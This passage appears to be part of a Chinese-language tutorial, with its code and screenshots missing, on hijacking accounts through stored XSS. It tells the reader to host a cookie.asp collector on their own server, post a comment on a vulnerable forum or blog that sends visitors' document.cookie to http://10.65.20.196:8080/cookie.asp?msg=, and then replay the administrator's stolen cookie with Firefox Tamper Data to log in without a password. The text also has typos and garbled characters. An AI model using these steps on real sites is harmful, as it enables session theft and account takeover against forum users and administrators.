//先构造一个路径也就是取网站根目录,创造一个在根目录下的code.txt路径保存在testfile中
//获取提交过来的msg变量,也就是cookie值
把上述文件保存为cookie.asp文件放到你自己的网站服务器下。比洳这里我们自己搭建的服务器为:http://10.65.20.196:8080
把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss比如你找到了某个博客或者论坛什麼的存在存储型XSS,你在里面发一篇帖子或者留上你的评论内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后就會触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg='+document.cookie的页面然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。
1、在存在漏洞的论坛中发日志:
2、然后以管理远登陆进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:
3、这是没有账户前嘚登陆界面:
4、打开firefox的Tamper Data插件点击Start Tamper开始抓取信息,刷新登陆界面然后会跳出对话框,点击Tamper按钮在途中的cookie一栏中替换掉你抓取到的cookie,单擊确定发送请求数据:
5、替换cookie后不用输用户名密码就顺利进入管理员账户了: